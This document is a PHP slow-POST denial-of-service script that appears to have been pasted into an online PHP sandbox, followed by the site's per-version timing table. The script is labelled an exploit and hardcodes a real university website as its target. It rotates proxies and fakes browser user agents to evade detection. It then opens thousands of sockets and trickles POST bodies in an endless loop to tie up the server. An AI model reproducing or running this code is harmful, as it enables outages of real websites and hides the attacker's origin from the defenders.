@ 2013-05-26T21:06:09Z <?php
set_time_limit(0);
ignore_user_abort(true);
$_SERVER['argv'][1] = 'http://www.estesl.ipl.pt/procurar/%rand%';
//-------------------------
// CONFiG
//-------------------------
$CONFIG['max_cookies'] = 20;
$CONFIG['max_sockets'] = 9001;
$CONFIG['timeout_ms'] = 500;
$CONFIG['usleep_time'] = 10;
//-------------------------
// INiT
//-------------------------
// Check SAPI
if(PHP_SAPI != 'cli') { exitWithError('This script is not meant to be ran via browser.'); }
// Check PHP Version
if(version_compare(PHP_VERSION, '5.0.4') < 0) { exitWithError('This script only supports PHP 5.0.4 and higher.'); }
// Define exploit version
if(!defined('EXPLOIT_VERSION')) { define('EXPLOIT_VERSION', 'v3.0.3'); }
// Define input stream
if(!defined('STDIN')) { define('STDIN', fopen('php://stdin', 'r')); }
// Globals - DO NOT EDIT
$global_proxy_array = array();
//-------------------------
// FUNCTIONS
//-------------------------
/** Read STDIN and return it */
function readSTDIN($message) {
echo PHP_EOL.$message.' : ';
return trim(fgets(STDIN));
}
/** Exit with error message */
function exitWithError($message) {
echo '[ERROR] '.$message;
exit(1);
}
/** Receive a filename that has proxies listed in it and fills the $global_proxy_array */
function proxyLoadFile($filename) {
global $global_proxy_array;
// Load proxy list file
$filename = str_replace('\\', '/', $filename);
$content = @file_get_contents($filename);
if(!$content) { exitWithError($filename.' is not a valid proxy-list file!'); }
$content = str_replace(array("\r\n", "\r"), "\n", $content);
$content = explode("\n", $content);
// Grab the proxies
foreach($content as $value) {
$tmp = explode(':', $value);
if(isset($tmp[0], $tmp[1])) {
$tmp[0] = trim($tmp[0]);
$tmp[1] = (int)(trim($tmp[1]));
$global_proxy_array[] = array('host' => $tmp[0], 'port' => $tmp[1]);
}
}
}
/** Returns a random a proxy */
function proxyGetRandom() {
global $global_proxy_array;
$proxy = false;
if(count($global_proxy_array)) {
while(!$proxy) {
$rand = mt_rand(0, count($global_proxy_array) - 1);
$proxy = (isset($global_proxy_array[$rand]) ? $global_proxy_array[$rand] : null);
}
}
return $proxy;
}
/** Returns a random useragent */
function randomUserAgent() {
// Random Windows version
$os = array('5.1', '5.2', '6.0', '6.1', '6.2');
$os = $os[mt_rand(0, count($os) - 1)];
// Select a random browser
if(mt_rand(0, 1)) {
// Random Internet Explorer version
$ua[0] = array('4.0', '8.0', '4.0');
$ua[1] = array('5.0', '9.0', '5.0');
$ua[2] = array('5.0', '10.0', '6.0');
$ua = $ua[mt_rand(0, count($ua) - 1)];
return "Mozilla/{$ua[0]} (compatible; MSIE {$ua[1]}; Windows NT {$os}; Trident/{$ua[2]})";
} else {
// Random Mozilla Firefox version
$ua = mt_rand(17, 21);
return "Mozilla/5.0 (Windows NT {$os}; rv:{$ua}.0) Gecko/20100101 Firefox/{$ua}.0";
}
}
/** Build stream context or header for connection */
function buildStreamContext($newEraUrl, $newEraProxy, $method='GET', $length='0', $cookie='', $just_header=false)
{
// Proxy support
$proxy = $newEraProxy ? $newEraProxy->full_url : '';
$fulluri = ($newEraProxy && !$newEraUrl->ssl) ? true : false;
// Prepare for header build
$header = '';
// When we return header, set the GET/POST line
if($just_header)
$header .= $method.' '.($fulluri ? $newEraUrl->full_url : $newEraUrl->path).' HTTP/1.1'."\r\n";
// Continue building the header
$header .= 'Host: '.$newEraUrl->name."\r\n";
$header .= 'Connection: Keep-Alive'."\r\n";
$header .= 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n";
$header .= 'User-Agent: '.randomUserAgent()."\r\n";
$header .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n";
$header .= 'Accept-Encoding: gzip,deflate'."\r\n";
$header .= 'Keep-Alive: '.mt_rand(60, 120)."\r\n";
if($method == 'POST') {
$header .= 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8'."\r\n";
$header .= mt_rand(0, 1) ? 'Referer: '.$newEraUrl->full_url."\r\n" : '';
$header .= ($cookie ? "Cookie: {$cookie}\r\n" : '');
$header .= "Content-Length: {$length}\r\n";
}
// When we return header, return it with an extra EOL for termination
if($just_header)
return $header."\r\n";
// Build stream context
$context = stream_context_create(array(
'http' => array(
'method' => $method,
'timeout' => (2),
'header' => $header,
'proxy' => $proxy,
'request_fulluri' => $fulluri,
'max_redirects' => (0),
'protocol_version' => (1.1),
'ignore_errors' => true
),
'ssl' => array(
'verify_peer' => false
)));
return $context;
}
/** Start slowPost */
function slowPostStart($newEraUrl, $newEraProxy, $cookie) {
global $CONFIG;
$obj = ($newEraProxy ? $newEraProxy : $newEraUrl);
$host = ($obj->ssl ? 'ssl://' : 'tcp://').$obj->name;
// Connect
if($socket = @fsockopen($host, $obj->port, $errno, $errstr, 2)) {
// Generate random Content-Length
$length = mt_rand(1337, 133700);
if($newEraProxy && $newEraUrl->ssl) {
// We must enable crypto when using a proxy and url with ssl
$header = 'CONNECT '.$newEraUrl->name.':'.$newEraUrl->port."\r\n";
$header .= 'Host: '.$newEraUrl->name.':'.$newEraUrl->port."\r\n";
$header .= 'Proxy-Connection: Keep-Alive'."\r\n\r\n";
@fwrite($socket, $header);
do { $s = trim(@fread($socket, 8192)); } while($s);
@stream_socket_enable_crypto($socket, true, STREAM_CRYPTO_METHOD_SSLv3_CLIENT);
}
// Send header
if(@fwrite($socket, buildStreamContext($newEraUrl, $newEraProxy, 'POST', $length, $cookie, true))) {
// Set the socket to be asynchronous
stream_set_blocking($socket, 0);
stream_set_timeout($socket, 0, $CONFIG['timeout_ms']);
// Return socket and the length remaining
return array('socket' => $socket, 'length' => $length);
}
}
return false;
}
/** Continue slowPost */
function slowPostContinue($socket, $bytes = 5) {
global $CONFIG;
// Check socket
if(!$socket)
return false;
// Check bytes
if(intval($bytes) != $bytes)
$bytes = 5;
// Throttle execution speed slightly
if($CONFIG['usleep_time'] > 0)
@usleep($CONFIG['usleep_time']);
// Do it
$tmp = '';
for($j = 0; $j < $bytes; $j++)
$tmp .= chr(mt_rand(ord('a'), ord('z')));
return @fwrite($socket, $tmp);
}
//-------------------------
// CLASSES
//-------------------------
/** I want cookies! Give me cookies! */
class NewEraCookies {
private $max_cookies;
private $cookies = array();
/** Constructor */
public function __construct($newEraUrl, $newEraProxy, $max_cookies, $proxyFile = null, $output = false) {
$this->update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile, $output);
}
/** Object updater */
public function update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile = null, $output = false) {
$this->max_cookies = $max_cookies;
$this->cookies = array();
if($output)
echo PHP_EOL.'BUILDING COOKIES ';
for($i = 0; $i < $this->max_cookies; $i++) {
// Using Proxy file?
if($proxyFile) {
$newproxy = proxyGetRandom();
if(!$newproxy) { exitWithError($proxyFile.' is not a valid proxy-list file!'); }
$newEraProxy->update_object($newproxy['host'].':'.$newproxy['port']);
}
$this->cookies[$i] = self::cookieGrab($newEraUrl, $newEraProxy);
if($output)
echo '.';
}
}
/** Returns a cookie by its index */
public function returnCookieByIndex($idx) {
if($idx == 'random')
$idx = mt_rand(0, $this->max_cookies - 1);
if(isset($this->cookies[$idx]))
return $this->cookies[$idx];
return '';
}
/** Function to parse set-cookie from header fields */
public static function cookieParse($header) {
$cookies = array();
foreach($header as $line) {
if(preg_match('/^Set-Cookie: /i', $line)) {
$line = preg_replace('/^Set-Cookie: /i', '', trim($line));
$csplit = explode(';', $line);
$cdata = array();
$grabbed_cookie_data = false;
foreach($csplit as $data) {
$cinfo = explode('=', $data);
$cinfo[0] = trim($cinfo[0]);
if(!$grabbed_cookie_data) {
$cdata['value']['key'] = $cinfo[0];
$cdata['value']['value'] = $cinfo[1];
$grabbed_cookie_data = true;
continue;
}
$cinfo[0] = strtolower($cinfo[0]);
if($cinfo[0] == 'expires') $cinfo[1] = @strtotime($cinfo[1]);
if($cinfo[0] == 'secure') $cinfo[1] = 'true';
if(in_array($cinfo[0], array('domain', 'expires', 'path', 'secure', 'comment'))) {
$cdata[$cinfo[0]] = $cinfo[1];
}
}
$cookies[] = $cdata;
}
}
return $cookies;
}
/** Function to build the request cookie header from parsed set-cookie data */
public static function cookieBuild($data) {
if(is_array($data)) {
$cookie = array();
foreach($data as $d)
$cookie[] = $d['value']['key'].'='.$d['value']['value'];
if(count($cookie) > 0)
return trim(implode('; ', $cookie));
}
return false;
}
/** Function to grab cookies from an url using PHP's fopen */
public static function cookieGrab($newEraUrl, $newEraProxy = null) {
$cookie = '';
$handle = @fopen($newEraUrl->full_url, 'r', false, buildStreamContext($newEraUrl, $newEraProxy, 'GET'));
// I hope this does work
if($handle) {
// Grab the cookies
$metadata = stream_get_meta_data($handle);
$cookie = self::cookieBuild(self::cookieParse($metadata['wrapper_data']));
@fclose($handle);
}
return $cookie;
}
}
/** Class to construct and handle an url-like object */
class NewEraUrl {
private $host_full_url;
private $host_protocol;
private $host_ssl;
private $host_name;
private $host_port;
private $host_path;
/** Constructor */
public function __construct($url) {
$this->update_object($url);
}
/** Object updater */
public function update_object($url) {
$this->host_full_url = $url;
// URL: SSL and protocol
$this->host_ssl = (strpos($url, 'https') === 0) ? true : false;
$this->host_protocol = ($this->host_ssl ? 'https' : 'http');
$url = explode('/', $url, 4);
$url[2] = explode(':', $url[2], 2);
// URL: Name, port and path
$this->host_name = $url[2][0];
$this->host_port = (isset($url[2][1]) ? $url[2][1] : ($this->host_ssl ? 443 : 80));
$this->host_path = '/'.(isset($url[3]) ? $url[3] : '');
}
/** Getter for the private properties */
public function __get($var) {
$var = 'host_'.$var;
if(isset($this->{$var}))
{
// Random support
$str = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
$str = substr(str_shuffle($str), 0, 8);
// Return string with random generated content
return str_replace('%rand%', $str, $this->{$var});
}
}
/** Quick check to see if url is minimally valid */
public static function isValid($url) {
if(strpos($url, 'https://') === 0) {
if(!extension_loaded('openssl')) { exitWithError('OpenSSL extension is not loaded - Unable to access HTTPS URL'); }
return true;
} else if(strpos($url, 'http://') === 0) {
return true;
}
return false;
}
}
/** Class to construct and handle a proxy-like object */
class NewEraProxy {
private $proxy_full_url;
private $proxy_name;
private $proxy_port;
/** Constructor */
public function __construct($url) {
$this->update_object($url);
}
/** Object updater */
public function update_object($url) {
if(FALSE !== ($tmp = strpos($url, '://')))
{
$tmp += 3;
$url = substr($url, $tmp);
}
$url = explode(':', $url);
// Proxy: Name, port and full URL
$this->proxy_name = $url[0];
$this->proxy_port = (int)(isset($url[1]) ? $url[1] : '8080');
$this->proxy_full_url = 'tcp://'.$this->proxy_name.':'.$this->proxy_port;
}
/** Getter for the private properties */
public function __get($var) {
$var = 'proxy_'.$var;
if(isset($this->{$var}))
return $this->{$var};
}
}
//-------------------------
// MAiN CODE FOR THE LULZ
//-------------------------
echo "
_______. __ ______ ____ __ ____
/ || | / __ \ \ \ / \ / /
| (----`| | | | | | \ \/ \/ /
\ \ | | | | | | \ /
.----) | | `----.| `--' | \ /\ /
|_______/ |_______| \______/ \__/ \__/
.______ ______ _______.___________.
| _ \ / __ \ / | |
| |_) | | | | | | (----`---| |----`
| ___/ | | | | \ \ | |
| | | `--' | .----) | | |
| _| \______/ |_______/ |__|
";
echo PHP_EOL.EXPLOIT_VERSION.' by NewEraCracker'.PHP_EOL;
// Fetch the URL to attack
$url = null;
if(isset($_SERVER['argv'][1]) && NewEraUrl::isValid($_SERVER['argv'][1]))
$url = $_SERVER['argv'][1];
// Fetch proxy to use
$proxy = array();
if(!empty($url) && isset($_SERVER['argv'][2])) {
if($proxy = explode(':', $_SERVER['argv'][2])) {
if(isset($proxy[0], $proxy[1])) {
$proxy['file'] = false;
$proxy['host'] = $proxy[0];
$proxy['port'] = (int)($proxy[1]);
unset($proxy[0], $proxy[1]);
}
}
if(!(isset($proxy['host'], $proxy['port'])) && is_readable($_SERVER['argv'][2])) {
$proxy['file'] = true;
$proxy['filename'] = $_SERVER['argv'][2];
}
}
// Ask for proxy
if((empty($proxy['host']) || empty($proxy['port'])) && empty($url) && empty($proxy['file'])) {
do {
switch($tmp = substr(strtolower(readSTDIN('Do you want to use a proxy [yes/no/file]')), 0, 1)) {
case 'n':
break;
case 'y':
$proxy['host'] = readSTDIN('Proxy IP');
$proxy['port'] = (int)(readSTDIN('Proxy port'));
break;
case 'f':
$proxy['filename'] = readSTDIN('Proxy file');
if(is_readable($proxy['filename'])) {
$proxy['file'] = true;
} else {
echo PHP_EOL.'Invalid file!'.PHP_EOL;
$tmp = null;
}
break;
default:
$tmp = null;
echo PHP_EOL.'Invalid choice!'.PHP_EOL;
break;
}
} while(!$tmp);
}
// Ask for target URL
while(!$url) {
$url = readSTDIN('Target url');
if(NewEraUrl::isValid($url)) break;
$url = null;
echo PHP_EOL.'Invalid target!'.PHP_EOL;
}
// Init proxy support
if(empty($proxy['host']) || empty($proxy['port'])) {
$newEraProxy = null;
if(!empty($proxy['file'])) {
proxyLoadFile($proxy['filename']);
$newproxy = proxyGetRandom();
if(!$newproxy) { exitWithError($proxy['filename'].' is not a valid proxy-list file!'); }
$newEraProxy = new NewEraProxy($newproxy['host'].':'.$newproxy['port']);
}
} else {
$newEraProxy = new NewEraProxy($proxy['host'].':'.$proxy['port']);
}
// Init the others
$newEraUrl = new NewEraUrl($url);
$newEraCookies = new NewEraCookies($newEraUrl, $newEraProxy, $CONFIG['max_cookies'], @$proxy['file'], true);
// Start
echo PHP_EOL.'IMMA FIRIN MAH LAZOR ';
$fp = array();
// Do it
while(1) {
for($i = 0; $i < $CONFIG['max_sockets']; $i++) {
// Using Proxy file?
if(!empty($proxy['file'])) {
$newproxy = proxyGetRandom();
if(!$newproxy) { exitWithError($proxy['filename'].' is not a valid proxy-list file!'); }
$newEraProxy->update_object($newproxy['host'].':'.$newproxy['port']);
}
// Open a new socket
if($tmp = slowPostStart($newEraUrl, $newEraProxy, $newEraCookies->returnCookieByIndex('random'))) {
// Progress bar
echo '.';
if(isset($fp[$i], $fp[$i]['socket'])) {
// Close connection in the global socket array if it's being used
@fclose($fp[$i]['socket']);
unset($fp[$i]);
}
// Save the new socket in the global socket array
$fp[$i] = $tmp;
}
// Check the current slowPosts
foreach($fp as $k => $v) {
if($fp[$k]['socket'] && ($fp[$k]['length'] > 0)) {
// Contine current
$tmp = ($fp[$k]['length'] < 5) ? $fp[$k]['length'] : 5;
slowPostContinue($fp[$k]['socket'], $tmp);
$fp[$k]['length'] -= $tmp;
} else {
// Close completed
@fclose($fp[$k]['socket']);
unset($fp[$k]);
}
}
}
}
?>
Enable javascript to submit You have javascript disabled. You will not be able to edit any code.
Here you find the average performance (time & memory) of each version. A grayed out version indicates it didn't complete successfully (based on exit-code).
Version System time (s) User time (s) Memory (MiB) 8.3.6 0.944 1.061 18.54 8.3.5 0.848 1.154 22.05 8.3.4 0.859 1.142 19.29 8.3.3 0.836 1.158 19.09 8.3.2 0.860 1.144 19.41 8.3.1 0.912 1.089 19.96 8.3.0 0.919 1.082 23.97 8.2.18 0.833 1.169 17.13 8.2.17 0.827 1.177 22.96 8.2.16 0.933 1.070 20.93 8.2.15 0.864 1.140 24.18 8.2.14 0.883 1.120 24.66 8.2.13 0.902 1.099 26.16 8.2.12 0.903 1.100 19.92 8.2.11 0.709 1.291 21.27 8.2.10 0.670 1.323 18.20 8.2.9 0.343 1.661 19.63 8.2.8 0.350 1.652 18.13 8.2.7 0.418 1.590 18.13 8.2.6 0.383 1.619 18.43 8.2.5 0.336 1.665 18.10 8.2.4 0.408 1.604 18.60 8.2.3 0.424 1.581 21.48 8.2.2 0.363 1.640 18.29 8.2.1 0.304 1.703 18.23 8.2.0 0.406 1.596 18.24 8.1.28 0.860 1.143 25.92 8.1.27 0.945 1.055 23.99 8.1.26 0.796 1.206 26.35 8.1.25 0.956 1.046 28.09 8.1.24 0.820 1.183 24.09 8.1.23 0.603 1.399 17.66 8.1.22 0.340 1.661 18.16 8.1.21 0.410 1.595 18.77 8.1.20 0.413 1.590 17.85 8.1.19 0.370 1.634 17.73 8.1.18 0.307 1.697 18.10 8.1.17 0.436 1.565 19.01 8.1.16 0.401 1.606 19.29 8.1.15 0.330 1.672 19.20 8.1.14 0.406 1.596 17.89 8.1.13 0.360 1.642 18.33 8.1.12 0.419 1.581 17.86 8.1.11 0.420 1.582 17.74 8.1.10 0.360 1.643 17.86 8.1.9 0.376 1.625 17.84 8.1.8 0.340 1.664 17.86 8.1.7 0.330 1.673 17.80 8.1.6 0.376 1.625 17.94 8.1.5 0.343 1.659 17.86 8.1.4 0.326 1.674 18.05 8.1.3 0.273 1.730 18.11 8.1.2 0.340 1.662 17.88 8.1.1 0.280 1.724 18.06 8.1.0 0.307 1.696 17.92 8.0.30 0.356 1.646 20.16 8.0.29 0.386 1.616 17.25 8.0.28 0.326 1.673 18.88 8.0.27 0.360 1.642 17.68 8.0.26 0.423 1.578 17.18 8.0.25 0.407 1.596 17.37 8.0.24 0.353 1.651 17.32 8.0.23 0.316 1.685 17.28 8.0.22 0.363 1.639 17.33 8.0.21 0.320 1.682 17.21 8.0.20 0.377 1.627 17.38 8.0.19 0.326 1.675 17.27 8.0.18 0.326 1.675 17.44 8.0.17 0.396 1.607 17.27 8.0.16 0.353 1.651 17.33 8.0.15 0.333 1.670 17.35 8.0.14 0.327 1.677 17.20 8.0.13 0.313 1.689 13.98 8.0.12 1.306 0.641 17.43 8.0.11 1.360 0.586 17.26 8.0.10 1.269 0.677 17.32 8.0.9 1.359 0.628 17.34 8.0.8 1.352 0.593 17.42 8.0.7 1.331 0.639 17.34 8.0.6 1.382 0.573 17.21 8.0.5 1.322 0.626 17.43 8.0.3 1.429 0.524 17.55 8.0.2 1.416 0.530 17.54 8.0.1 1.303 0.645 17.43 8.0.0 1.149 0.478 17.13 7.4.33 0.396 1.605 15.04 7.4.32 0.330 1.673 16.83 7.4.30 0.333 1.670 16.69 7.4.29 0.356 1.645 16.96 7.4.28 0.330 1.671 16.80 7.4.27 0.313 1.687 16.87 7.4.26 0.283 1.720 13.78 7.4.25 1.281 0.639 16.80 7.4.24 1.340 0.610 16.96 7.4.23 1.349 0.595 17.00 7.4.22 1.137 0.557 16.93 7.4.21 1.311 0.636 16.88 7.4.20 1.291 0.649 16.76 7.4.19 1.280 0.667 17.07 7.4.16 1.422 0.529 16.91 7.4.15 1.438 0.518 17.40 7.4.14 1.499 0.464 17.86 7.4.13 1.407 0.552 17.02 7.4.12 1.449 0.520 16.93 7.4.11 1.522 0.534 16.80 7.4.10 1.472 0.586 17.07 7.4.9 1.548 0.527 16.95 7.4.8 1.443 0.537 19.39 7.4.7 1.417 0.605 17.04 7.4.6 1.276 0.592 16.91 7.4.5 1.306 0.685 16.81 7.4.4 1.346 0.719 22.52 7.4.3 1.399 0.628 16.81 7.3.33 0.300 1.701 13.90 7.3.32 0.313 1.687 13.87 7.3.31 1.310 0.634 16.81 7.3.30 1.310 0.639 16.71 7.3.29 1.329 0.615 16.80 7.3.28 1.326 0.613 16.82 7.3.27 1.416 0.537 17.40 7.3.26 1.443 0.507 18.24 7.3.25 1.440 0.514 16.88 7.3.24 1.367 0.601 16.99 7.3.23 1.466 0.577 16.85 7.3.21 1.511 0.571 16.95 7.3.20 1.398 0.612 19.39 7.3.19 1.383 0.636 16.75 7.3.18 1.383 0.652 16.78 7.3.17 1.342 0.655 16.96 7.3.16 1.390 0.631 16.83 7.2.33 1.536 0.537 16.97 7.2.32 1.410 0.606 16.91 7.2.31 1.406 0.619 17.01 7.2.30 1.386 0.643 16.95 7.2.29 1.330 0.705 17.24 7.2.10 1.344 0.423 15.24 7.1.22 1.214 0.412 14.14 5.6.38 1.364 0.501 14.60
preferences:dark mode live preview
41.73 ms | 401 KiB | 5 Q